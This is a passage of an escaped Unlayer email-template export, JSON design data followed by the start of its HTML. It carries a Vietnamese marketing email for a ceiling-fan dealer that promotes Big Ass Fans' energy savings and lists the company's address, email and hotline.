b\\u1ea1n.<\\/span><\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"GOL31FaRLf\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hwbTiM3Utx\\\",\\\"contents\\\":[{\\\"id\\\":\\\"oMjfj_SbVL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180196473-sunon_1.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"s0WlKmKnTa\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180218600-vimf-2023.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RUz7q_ip8X\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181250240-contact.jpg\\\",\\\"width\\\":2125,\\\"height\\\":1341},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"em1-YlvAoX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_fkVaQ2PEN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qZBv269hpu\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#cc7202\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"THUwYakHTm\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kwzqhG799A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3tEuovNfbn\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R2C4DOPmwe\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OL5bSnxx7M\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jz40CXaHYv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zFw374rru6\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":15,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YGvjojNYO8\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#333333\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 25.2px;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 180%;\\\\\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 180%;\\\\\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\\\n<p style=\\\\\\\"line-height: 180%;\\\\\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\\\n<p style=\\\\\\\"line-height: 180%;\\\\\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/haiku.hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaGFpa3UuaG9naWFwaGF0LnZuIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fdf4ef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_image_1 .v-src-width { width: auto !important; } #u_content_image_1 .v-src-max-width { max-width: 90% !important; } #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_text_18 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fdf4ef;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fdf4ef;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fdf4ef;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #000000\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #000000;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #000000;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #000000;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_1\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181449479-logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 94%;max-width: 545.2px;\\\" width=\\\"545.2\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  